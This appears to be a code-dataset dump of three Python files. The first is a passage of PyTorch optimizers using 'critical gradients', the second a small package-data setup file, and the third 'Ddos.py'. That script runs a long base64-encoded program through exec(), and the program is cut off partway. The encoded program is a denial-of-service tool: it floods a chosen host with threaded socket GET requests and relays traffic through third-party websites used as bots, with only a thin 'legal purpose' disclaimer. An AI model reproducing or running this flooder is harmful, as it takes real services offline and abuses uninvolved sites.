if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], p.data)
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1) # m_t
exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2) # v_t
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = (max_exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(
group['eps'])
else:
denom = (exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(
group['eps'])
step_size = group['lr'] / bias_correction1
state['critical gradients'].decay()
if param_level:
exp_avg = aggregate(exp_avg, state['critical gradients'], sum)
p.addcdiv_(exp_avg, denom, value=-step_size)
return loss
class RMSprop_C_double(Optimizer):
r"""Implementation of RMSprop with critical gradients.
Replaces current-iteration gradient in conventional PyTorch implementation with
an aggregation of current gradient and critical gradients.
Conventional RMSprop can be recovered by setting kappa=0.
The critical-gradient-specific keyword parameters are tuned for good
off-the-shelf performance, though additional tuning may be required for best results
Order of computing update step and updating buffer inverted, leading to double counting.
"""
def __init__(self, params, lr=1e-2, alpha=0.99, eps=1e-8, weight_decay=0,
momentum=0, centered=False, decay=0.95,
kappa=1.0, topC=10, sum='sum'):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= momentum:
raise ValueError("Invalid momentum value: {}".format(momentum))
if not 0.0 <= weight_decay:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
if not 0.0 <= alpha:
raise ValueError("Invalid alpha value: {}".format(alpha))
defaults = dict(lr=lr, momentum=momentum, alpha=alpha, eps=eps,
centered=centered, weight_decay=weight_decay,
sum=sum, kappa=kappa, topC=topC, decay=decay)
super(RMSprop_C_double, self).__init__(params, defaults)
self.resetOfflineStats()
def __setstate__(self, state):
super(RMSprop_C_double, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('momentum', 0)
group.setdefault('centered', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Args:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad
grad_norm = grad.norm()
if grad.is_sparse:
raise RuntimeError('RMSprop does not support sparse gradients')
kappa = group['kappa']
decay = group['decay']
topc = group['topC']
sum = group['sum']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
state['square_avg'] = \
torch.zeros_like(p, memory_format=torch.preserve_format)
if group['momentum'] > 0:
state['momentum_buffer'] = \
torch.zeros_like(p, memory_format=torch.preserve_format)
if group['centered']:
state['grad_avg'] = \
torch.zeros_like(p, memory_format=torch.preserve_format)
if kappa > 0.:
state['critical gradients'] = priorityDict()
state['critical gradients'].setHyper(decay_rate=decay, K=topc)
state['critical gradients'][grad_norm] = deepcopy(grad)
else:
if kappa > 0.:
if state['critical gradients'].isFull():
if grad_norm > state['critical gradients'].pokeSmallest():
self.offline_grad['yes'] += 1
state['critical gradients'][grad_norm] = deepcopy(grad)
else:
self.offline_grad['no'] += 1
else:
state['critical gradients'][grad_norm] = deepcopy(grad)
square_avg = state['square_avg']
alpha = group['alpha']
state['step'] += 1
if kappa > 0.:
grad = aggregate(grad, state['critical gradients'], sum)
if group['weight_decay'] != 0:
grad = grad.add(p, alpha=group['weight_decay'])
square_avg.mul_(alpha).addcmul_(grad, grad, value=1 - alpha)
if group['centered']:
grad_avg = state['grad_avg']
grad_avg.mul_(alpha).add_(grad, alpha=1 - alpha)
avg = square_avg.addcmul(grad_avg, grad_avg, value=-1).sqrt_().add_(
group['eps'])
else:
avg = square_avg.sqrt().add_(group['eps'])
state['critical gradients'].decay()
if group['momentum'] > 0:
buf = state['momentum_buffer']
buf.mul_(group['momentum']).addcdiv_(grad, avg)
p.add_(buf, alpha=-group['lr'])
else:
p.addcdiv_(grad, avg, value=-group['lr'])
return loss
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
class AggMo_custom(Optimizer):
"""
Custom Implementation of the AggMo optimizer. Not used in favor of original version.
"""
def __init__(self, params, lr=0.001, momenta=[], dampening=0,
weight_decay=0):
if any(momentum < 0.0 for momentum in momenta):
raise ValueError("Invalid momentum value: at least one value is negative")
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momenta=torch.tensor(momenta).to(device),
dampening=dampening,
weight_decay=weight_decay)
super(AggMo_custom, self).__init__(params, defaults)
self.resetOfflineStats()
def __setstate__(self, state):
super(AggMo_custom, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momenta = group['momenta']
dampening = group['dampening']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p = d_p.add(weight_decay, p.data)
if len(momenta) != 0 and all(momentum != 0.0 for momentum in momenta):
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.stack(
[torch.clone(d_p).detach()] * len(momenta))
vec = param_state['momentum'] = torch.clone(momenta)
while vec.dim() < buf.dim(): vec.unsqueeze_(1)
else:
buf = param_state['momentum_buffer']
vec = param_state['momentum']
buf.mul_(vec)
buf.add_(d_p, alpha=1 - dampening)
d_p = torch.mean(buf, dim=0)
p.data.add_(d_p, alpha=-group['lr'])
return loss
class SGD_C_HIST(Optimizer):
"""
Implementation of SGD (and optionally SGD with momentum) with critical gradients.
Replaces current-iteration gradient in conventional PyTorch implementation with
an aggregation of current gradient and critical gradients.
Conventional SGD or SGD with momentum can be recovered by setting kappa=0.
The critical-gradient-specific keyword parameters are tuned for good off-the-shelf
performance, though additional tuning may be required for best results.
This version of SGD_C is designed to maintain each gradient's age and can be used to
generate histograms.
"""
def __init__(self, params, lr=0.001, kappa=1.0, dampening=0.,
weight_decay=0, momentum=0.,
decay=0.7, topC=10, aggr='sum'):
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
if not 0.0 <= decay and not 1.0 > decay:
raise ValueError("Invalid alpha value: {}".format(decay))
if not 0.0 <= topC:
raise ValueError("Invalid alpha value: {}".format(topC))
defaults = dict(lr=lr, kappa=kappa, dampening=dampening,
weight_decay=weight_decay, momentum=momentum,
aggr=aggr, decay=decay, gradHist={}, topC=topC)
super(SGD_C_HIST, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
self._age_at_removal = []
self._age_at_epoch_end = []
def getOfflineStats(self):
return self.offline_grad
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0}
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(SGD_C_HIST, self).__setstate__(state)
def get_ages(self):
return (self._age_at_removal, self._age_at_epoch_end)
def epoch(self):
param_state = self.state[
self.param_groups[0]['params'][0]] # This is gross but it works
crit_buf = param_state['critical gradients']
epoch_ages = crit_buf.epoch()
for age in epoch_ages:
self._age_at_epoch_end.append(age)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
kappa = group['kappa']
dampening = group['dampening']
decay = group['decay']
momentum = group['momentum']
topc = group['topC']
aggr = group['aggr']
total_norm = 0.0
age_to_keep = 0.0
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
total_norm += torch.sqrt(torch.sum(torch.square(d_p)))
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p = d_p.add(weight_decay, p.data)
if kappa != 0:
param_state = self.state[p]
if 'critical gradients' not in param_state:
crit_buf = param_state['critical gradients'] = priorityDict()
crit_buf.sethyper(decay_rate=decay, K=topc, hist=True)
crit_buf[total_norm] = deepcopy(d_p)
else:
crit_buf = param_state['critical gradients']
aggr_grad = aggregate(d_p, crit_buf, aggr, kappa)
if crit_buf.isFull():
if total_norm > crit_buf.pokeSmallest():
self.offline_grad['yes'] += 1
age_to_keep = crit_buf.pokeSmallestAge()
crit_buf[total_norm] = deepcopy(d_p)
else:
self.offline_grad['no'] += 1
else:
crit_buf[total_norm] = deepcopy(d_p)
d_p = aggr_grad
self.g_analysis['gc'] += crit_buf.averageTopC()
self.g_analysis['count'] += 1
self.g_analysis['gt'] += p.grad.data.norm()
crit_buf.decay()
crit_buf.step()
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(
d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
d_p = buf
p.data.add_(d_p, alpha=-group['lr'])
if age_to_keep > 0:
self._age_at_removal.append(age_to_keep)
return loss
class AggMo(Optimizer):
r"""Implements Aggregated Momentum Gradient Descent
Original Paper: https://arxiv.org/pdf/1804.00325.pdf
Code: https://github.com/AtheMathmo/AggMo
"""
def __init__(self, params, lr=0.1, betas=[0.0, 0.9, 0.99], weight_decay=0):
defaults = dict(lr=lr, betas=betas, weight_decay=weight_decay)
super(AggMo, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
def getOfflineStats(self):
return self.offline_grad
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0}
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
@classmethod
def from_exp_form(cls, params, lr=0.1, a=0.1, k=3, weight_decay=0):
betas = [1 - a ** i for i in range(k)]
return cls(params, lr, betas, weight_decay)
def __setstate__(self, state):
super(AggMo, self).__setstate__(state)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
betas = group['betas']
total_mom = float(len(betas))
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p.add_(weight_decay, p.data)
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
param_state['momentum_buffer'] = {}
for beta in betas:
param_state['momentum_buffer'][beta] = torch.zeros_like(p.data)
for beta in betas:
buf = param_state['momentum_buffer'][beta]
# import pdb; pdb.set_trace()
buf.mul_(beta).add_(d_p)
p.data.sub_(group['lr'] / total_mom, buf)
return loss
def zero_momentum_buffers(self):
for group in self.param_groups:
betas = group['betas']
for p in group['params']:
param_state = self.state[p]
param_state['momentum_buffer'] = {}
for beta in betas:
param_state['momentum_buffer'][beta] = torch.zeros_like(p.data)
def update_hparam(self, name, value):
for param_group in self.param_groups:
param_group[name] = value
class AggMo_C(Optimizer):
r"""Implements Aggregated Momentum Gradient Descent
Replaces AggMo's computation of several SGDM steps with SGDM_C steps
"""
def __init__(self, params, lr=0.1, betas=[0.0, 0.9, 0.99], weight_decay=0,
dampening=0.0, decay=0.7, topC=10,
aggr='sum',
sampling=None, critical_test=True, kappa=1.0):
if any(momentum < 0.0 for momentum in betas):
raise ValueError("Invalid beta value!")
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
if not 0.0 <= decay and not 1.0 > decay:
raise ValueError("Invalid alpha value: {}".format(decay))
if not 0.0 <= topC:
raise ValueError("Invalid alpha value: {}".format(topC))
defaults = dict(lr=lr, weight_decay=weight_decay, betas=betas, kappa=kappa,
dampening=dampening,
aggr=aggr, decay=decay, gradHist={}, topC=topC,
sampling=sampling, critical_test=critical_test)
super(AggMo_C, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
def getOfflineStats(self):
return self.offline_grad
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0}
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
@classmethod
def from_exp_form(cls, params, lr=0.1, a=0.1, k=3, weight_decay=0):
betas = [1 - a ** i for i in range(k)]
return cls(params, lr, betas, weight_decay)
def __setstate__(self, state):
super(AggMo_C, self).__setstate__(state)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
betas = group['betas']
total_mom = float(len(betas))
dampening = group['dampening']
decay = group['decay']
topc = group['topC']
aggr = group['aggr']
kappa = group['kappa']
total_norm = 0.0
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
total_norm += torch.sqrt(torch.sum(torch.square(d_p)))
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p = d_p.add(weight_decay, p.data)
if kappa != 0:
param_state = self.state[p]
if 'critical gradients' not in param_state:
crit_buf = param_state['critical gradients'] = priorityDict()
crit_buf.setHyper(decay_rate=decay, K=topc)
crit_buf[total_norm] = deepcopy(d_p)
else:
crit_buf = param_state['critical gradients']
aggr_grad = aggregate(d_p, crit_buf, aggr, 1.0)
if crit_buf.isFull():
if total_norm > crit_buf.pokeSmallest():
self.offline_grad['yes'] += 1
crit_buf[total_norm] = deepcopy(d_p)
else:
self.offline_grad['no'] += 1
else:
crit_buf[total_norm] = deepcopy(d_p)
d_p = aggr_grad
self.g_analysis['gc'] += crit_buf.averageTopC()
self.g_analysis['count'] += 1
self.g_analysis['gt'] += p.grad.data.norm()
crit_buf.decay()
if weight_decay != 0:
d_p.add_(weight_decay, p.data)
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
param_state['momentum_buffer'] = {}
for beta in betas:
param_state['momentum_buffer'][beta] = torch.zeros_like(p.data)
for beta in betas:
buf = param_state['momentum_buffer'][beta]
# import pdb; pdb.set_trace()
buf.mul_(beta).add_(d_p)
p.data.sub_(group['lr'] / total_mom, buf)
return loss
def zero_momentum_buffers(self):
for group in self.param_groups:
betas = group['betas']
for p in group['params']:
param_state = self.state[p]
param_state['momentum_buffer'] = {}
for beta in betas:
param_state['momentum_buffer'][beta] = torch.zeros_like(p.data)
def update_hparam(self, name, value):
for param_group in self.param_groups:
param_group[name] = value
| 40.448041 | 101 | 0.513976 | 7,796 | 71,229 | 4.513597 | 0.048102 | 0.007332 | 0.042514 | 0.006963 | 0.927362 | 0.913834 | 0.898062 | 0.888002 | 0.879448 | 0.872996 | 0 | 0.014406 | 0.385068 | 71,229 | 1,760 | 102 | 40.471023 | 0.788955 | 0.10448 | 0 | 0.863215 | 0 | 0 | 0.090259 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075734 | false | 0 | 0.003864 | 0.017774 | 0.12442 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b26e2a3d174a48d87ba5106a60c95f4b2671cbfe | 127 | py | Python | cone_search_plus/setup_package.py | hover2pi/cone_search_plus | 655cf894b201e31ac269e072b98191d4c394e829 | [
"MIT"
] | null | null | null | cone_search_plus/setup_package.py | hover2pi/cone_search_plus | 655cf894b201e31ac269e072b98191d4c394e829 | [
"MIT"
] | null | null | null | cone_search_plus/setup_package.py | hover2pi/cone_search_plus | 655cf894b201e31ac269e072b98191d4c394e829 | [
"MIT"
] | null | null | null | from distutils.extension import Extension
def get_package_data():
return {'cone_search_plus': ['data/*', 'data/radii/*']}
| 25.4 | 59 | 0.716535 | 16 | 127 | 5.4375 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11811 | 127 | 4 | 60 | 31.75 | 0.776786 | 0 | 0 | 0 | 0 | 0 | 0.267717 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
a238a76f61ecece173477ac6de559822b665eb24 | 8,101 | py | Python | Ddos.py | B012ED/Ddos | ef4a736daf39024e805ec4872e3b5448c4a57c24 | [
"Apache-2.0"
] | 2 | 2022-01-31T00:20:50.000Z | 2022-02-24T02:03:33.000Z | Ddos.py | B012ED/Ddos | ef4a736daf39024e805ec4872e3b5448c4a57c24 | [
"Apache-2.0"
] | null | null | null | Ddos.py | B012ED/Ddos | ef4a736daf39024e805ec4872e3b5448c4a57c24 | [
"Apache-2.0"
] | 1 | 2021-11-12T19:45:23.000Z | 2021-11-12T19:45:23.000Z | # Scrypt By YUSA
# YT B012ED
import base64
import marshal,zlib,base64
#exec(marshal.loads('https://b012ed.github.io')
#zlib&base32&marshal"exec(marshal.load('HgHhbjggTfghUggUgffUhghJhhIbbiGgtGfghHhhuHhjiiBbjjBbhgGggGggTrdFdeSddssGhHhhOjbKinjIjbjIhhhHhggHghhUyggGggggGgggHhGTTTyhhfDdsHjiJiGgjJvvJujGjuHgDdRrgYyyUu')
exec(base64.b64decode('IyEvdXNyL2Jpbi9weXRob24zCiMgLSotIGNvZGluZzogdXRmLTggLSotCgojIHB5dGhvbiAzIERkb3MtQXR0YWNrIFNjcmlwdCB2LjEKIyBieSBCMDEyRUQKIyBvbmx5IGZvciBsZWdhbCBwdXJwb3NlCgppbXBvcnQgb3MsdGltZSxzeXMsc2h1dGlsLGl0ZXJ0b29scyx0aHJlYWRpbmcscmFuZG9tCmZyb20gcXVldWUgaW1wb3J0IFF1ZXVlCmZyb20gb3B0cGFyc2UgaW1wb3J0IE9wdGlvblBhcnNlcgppbXBvcnQgdGltZSxzeXMsc29ja2V0LHRocmVhZGluZyxsb2dnaW5nLHVybGxpYi5yZXF1ZXN0LHJhbmRvbQoKZGVmIHl1c2Eocyk6CiAgICBmb3IgYyBpbiBzICsgJ1xuJzoKICAgICAgICBzeXMuc3Rkb3V0LndyaXRlKGMpCiAgICAgICAgc3lzLnN0ZG91dC5mbHVzaCgpCiAgICAgICAgdGltZS5zbGVlcChyYW5kb20ucmFuZG9tKCkgKiAwLjAxKQp5dXNhKCdpbXBvcnQgZGF0YSBmcm9tIDonKQpkb25lID0gRmFsc2UKCmRlZiBhbmltYXRlKCk6CiAgICBmb3IgYyBpbiBpdGVydG9vbHMuY3ljbGUoWydcMDMzWzM0OzFtfCcsICcvJywgJy0nLCAnXFxcMDMzWzAwbSddKToKICAgICAgICBpZiBkb25lOgogICAgICAgICAgICBicmVhawogICAgICAgIHN5cy5zdGRvdXQud3JpdGUoJ1xybG9hZGluZyAnICsgYykKICAgICAgICBzeXMuc3Rkb3V0LmZsdXNoKCkKICAgICAgICB0aW1lLnNsZWVwKDAuMSkKdCA9IHRocmVhZGluZy5UaHJlYWQodGFyZ2V0PWFuaW1hdGUpCnQuc3RhcnQoKQoKdGltZS5zbGVlcCgxMCkKZG9uZSA9IFRydWUKCnl1c2EoIlxuXDAzM1swMG1cdFwwMzNbNDE7MW0gaHR0cDovL2IwMTJlZC5naXRodWIuaW8gXDAzM1swMG0iKQoKeXVzYSgiIiJcMDMzWzM0OzFtCiAgICDilI/ilJMg4pSP4pSB4pST4pSP4pSB4pST4pSP4pSB4pW44pW64pSz4pST4pK4CiAgICDilKPilLvilJPilIMg4pSD4pSj4pSz4pSb4pSj4pW4ICDilIPilIMgXDAzM1s5NjsxbURkb3NcMDMzWzAwbQogXDAzM1s5NjsxbSAgIOKUl+KUgeKUm+KUl+KUgeKUm+KVueKUl+KVuOKUl+KUgeKVuOKVuuKUu+KUm1wwMzNbMDBtCiBcMDMzWzM0OzFtICAgY29weXJpZ2h0IDIwMjEgXDAzM1s5NjsxbVYxXDAzM1swMG0iIiIpCmRvbmUgPSBGYWxzZQpvcy5zeXN0ZW0oImRhdGUiKQpwcmludCAoIlwwMzNbMTszNG3igKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKLigKJcbiIpCgpkZWYgdXNlcl9hZ2VudCgpOgoJZ2xvYmFsIHVhZ2VudAoJdWFnZW50PVtdCgl1YWdlbnQuYXBwZW5kKCJNb3ppbGxhLzUuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4wKSBPcGVyYSAxMi4xNCIpCgl1YWdlbnQuYXBwZW5kKCJNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IGk2ODY7IHJ2OjI2LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMjYuMCIpCgl1YWdlbnQuYXBwZW5kKCJNb3ppbGxhLzUuMCAoWDExOyBVOyBMaW51eCB4ODZfNjQ7IGVuLVVTOyBydjoxLjkuMS4zKSBHZWNrby8yMDA5MDkxMyBGaXJlZm94LzMuNS4zIikKCXVhZ2VudC5hcHBlbmQoIk1vemlsbGEvNS4wIChXaW5kb3dzOyBVOyBXaW5kb3dzIE5UIDYuMTsgZW47IHJ2OjEuOS4xLjMpIEdlY2tvLzIwMDkwODI0IEZpcmVmb3gvMy41LjMgKC5ORVQgQ0xSIDMuNS4zMDcyOSkiKQoJdWFnZW50LmFwcGVuZCgiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4yKSBBcHBsZVdlYktpdC81MzUuNyAoS0hUTUwsIGxpa2UgR2Vja28pIENvbW9kb19EcmFnb24vMTYuMS4xLjAgQ2hyb21lLzE2LjAuOTEyLjYzIFNhZmFyaS81MzUuNyIpCgl1YWdlbnQuYXBwZW5kKCJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA1LjI7IGVuLVVTOyBydjoxLjkuMS4zKSBHZWNrby8yMDA5MDgyNCBGaXJlZm94LzMuNS4zICguTkVUIENMUiAzLjUuMzA3MjkpIikKCXVhZ2VudC5hcHBlbmQoIk1vemlsbGEvNS4wIChXaW5kb3dzOyBVOyBXaW5kb3dzIE5UIDYuMTsgZW4tVVM7IHJ2OjEuOS4xLjEpIEdlY2tvLzIwMDkwNzE4IEZpcmVmb3gvMy41LjEiKQoJcmV0dXJuKHVhZ2VudCkKCgpkZWYgbXlfYm90cygpOgoJZ2xvYmFsIGJvdHMKCWJvdHM9W10KCWJvdHMuYXBwZW5kKCJodHRwOi8vZXNzZW50aWFsdG91cnMuY29tL2NoZWNrP3VybD0iKQoJYm90cy5hcHBlbmQoImh0dHA6Ly9zYXZhbmFjbG91ZC5jb20vIikKCXJldHVybihib3RzKQoKCmRlZiBib3RfRGRvcyh1cmwpOgoJdHJ5OgoJCXdoaWxlIFRydWU6CgkJCXJlcSA9IHVybGxpYi5yZXF1ZXN0LnVybG9wZW4odXJsbGliLnJlcXVlc3QuUmVxdWVzdCh1cmwsaGVhZGVycz17J1VzZXItQWdlbnQnOiByYW5kb20uY2hvaWNlKHVhZ2VudCl9KSkKCQkJcHJpbnQoIlwwMzNbOTRtYm90IGlzIGF0dGFjay4uLlwwMzNbMG0iKQoJCQl0aW1lLnNsZWVwKC4xKQoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoLjEpCgoKZGVmIGRvd25faXQoaXRlbSk6Cgl0cnk6CgkJd2hpbGUgVHJ1ZToKCQkJcGFja2V0ID0gc3RyKCJHRVQgLyBIVFRQLzEuMVxuSG9zdDogIitob3N0KyJcblxuIFVzZXItQWdlbnQ6ICIrcmFuZG9tLmNob2ljZSh1YWdlbnQpKyJcbiIrZGF0YSkuZW5jb2RlKCd1dGYtOCcpCgkJCXMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCgkJCXMuY29ubmVjdCgoaG9zdCxpbnQocG9ydCkpKQoJCQlpZiBzLnNlbmR0byggcGFja2V0LCAoaG9zdCwgaW50KHBvcnQpKSApOgoJCQkJcy5zaHV0ZG93bigxKQoJCQkJcHJpbnQgKCJcMDMzWzk3bSIsdGltZS5jdGltZSh0aW1lLnRpbWUoKSksIlwwMzNbMG0gXDAzM1s5NG0uL0Rkb3MtQXR0YWNrIFwwMzNbMG0iKQoJCQllbHNlOgoJCQkJcy5zaHV0ZG93bigxKQoJCQkJcHJpbnQoIlwwMzNbOTFtIFNodXREb3duXDAzM1swbSIpCgkJCXRpbWUuc2xlZXAoLjEpCglleGNlcHQgc29ja2V0LmVycm9yIGFzIGU6CgkJcHJpbnQoIlwwMzNbOTFtTm8gQ29ubmVjdGlvbiEgU2VydmVyRG93blwwMzNbMG0iKQoJCSNwcmludCgiXDAzM1s5MW0iLGUsIlwwMzNbMG0iKQoJCXRpbWUuc2xlZXAoLjEpCgoKZGVmIGRvcygpOgoJd2hpbGUgVHJ1ZToKCQlpdGVtID0gcS5nZXQoKQoJCWRvd25faXQoaXRlbSkKCQlxLnRhc2tfZG9uZSgpCgoKZGVmIGRvczIoKToKCXdoaWxlIFRydWU6CgkJaXRlbT13LmdldCgpCgkJYm90X0Rkb3MocmFuZG9tLmNob2ljZShib3RzKSsiaHR0cDovLyIraG9zdCkKCQl3LnRhc2tfZG9uZSgpCgoKZGVmIHVzYWdlKCk6Cgl5dXNhKCcnJ1wwMzNbMTs5Nm3igKJcMDMzWzE7MzRtIEREb3MtQXR0YWNrIFNjcmlwdCB2LjEgaHR0cDovL2IwMTJlZC5naXRodWIuaW8KXDAzM1sxOzk2beKAoiBcMDMzWzE7MzRtRG9uJ3QgYWJ1c2UgQWxsIHJpc2tzIGFyZSBib3JuZSBieSB0aGUgdXNlci4KXDAzM1sxOzk2beKAoiBcMDMzWzE7MzRtSXQgaXMganVzdCBmb3Igc2VydmVyIHRlc3Rpbmcgc2NyaXB0LiBZb3VyIGlwIGlzIHZpc2libGUuIFxuClwwMzNbMTs5Nm3igKJcMDMzWzE7MzRtIHVzYWdlIDogcHl0aG9uMyBEZG9zLnB5IFstc10gWy1wXSBbLXRdCiAgIFstaF0gOiBoZWxwCiAgIFstc10gOiBzZXJ2ZXIgaXAKICAgWy1wXSA6IHBvcnQgZGVmYXVsdCA4MAogICBbLXRdIDogdHVyYm8gZGVmYXVsdCAxMzUgXG5cMDMzWzBtJycnKQoJc3lzLmV4aXQoKQoKCmRlZiBnZXRfcGFyYW1ldGVycygpOgoJZ2xvYmFsIGhvc3QKCWdsb2JhbCBwb3J0CglnbG9iYWwgdGhyCglnbG9iYWwgaXRlbQoJb3B0cCA9IE9wdGlvblBhcnNlcihhZGRfaGVscF9vcHRpb249RmFsc2UsZXBpbG9nPSJEZG9zIikKCW9wdHAuYWRkX29wdGlvbigiLXEiLCItLXF1aWV0IiwgaGVscD0ic2V0IGxvZ2dpbmcgdG8gRVJST1IiLGFjdGlvbj0ic3RvcmVfY29uc3QiLCBkZXN0PSJsb2dsZXZlbCIsY29uc3Q9bG9nZ2luZy5FUlJPUiwgZGVmYXVsdD1sb2dnaW5nLklORk8pCglvcHRwLmFkZF9vcHRpb24oIi1zIiwiLS1zZXJ2ZXIiLCBkZXN0PSJob3N0IixoZWxwPSJhdHRhY2sgdG8gc2VydmVyIGlwIC1zIGlwIikKCW9wdHAuYWRkX29wdGlvbigiLXAiLCItLXBvcnQiLHR5cGU9ImludCIsZGVzdD0icG9ydCIsaGVscD0iLXAgODAgZGVmYXVsdCA4MCIpCglvcHRwLmFkZF9vcHRpb24oIi10IiwiLS10dXJibyIsdHlwZT0iaW50IixkZXN0PSJ0dXJibyIsaGVscD0iZGVmYXVsdCAxMzUgLXQgMTM1IikKCW9wdHAuYWRkX29wdGlvbigiLWgiLCItLWhlbHAiLGRlc3Q9ImhlbHAiLGFjdGlvbj0nc3RvcmVfdHJ1ZScsaGVscD0iaGVscCB5b3UiKQoJb3B0cywgYXJncyA9IG9wdHAucGFyc2VfYXJncygpCglsb2dnaW5nLmJhc2ljQ29uZmlnKGxldmVsPW9wdHMubG9nbGV2ZWwsZm9ybWF0PSclKGxldmVsbmFtZSktOHMgJShtZXNzYWdlKXMnKQoJaWYgb3B0cy5oZWxwOgoJCXVzYWdlKCkKCWlmIG9wdHMuaG9zdCBpcyBub3QgTm9uZToKCQlob3N0ID0gb3B0cy5ob3N0CgllbHNlOgoJCXVzYWdlKCkKCWlmIG9wdHMucG9ydCBpcyBOb25lOgoJCXBvcnQgPSA4MAoJZWxzZToKCQlwb3J0ID0gb3B0cy5wb3J0CglpZiBvcHRzLnR1cmJvIGlzIE5vbmU6CgkJdGhyID0gMTM1CgllbHNlOgoJCXRociA9IG9wdHMudHVyYm8KCgojIHJlYWRpbmcgaGVhZGVycwpnbG9iYWwgZGF0YQpoZWFkZXJzID0gb3BlbigiaGVhZGVycy50eHQiLCAiciIpCmRhdGEgPSBoZWFkZXJzLnJlYWQoKQpoZ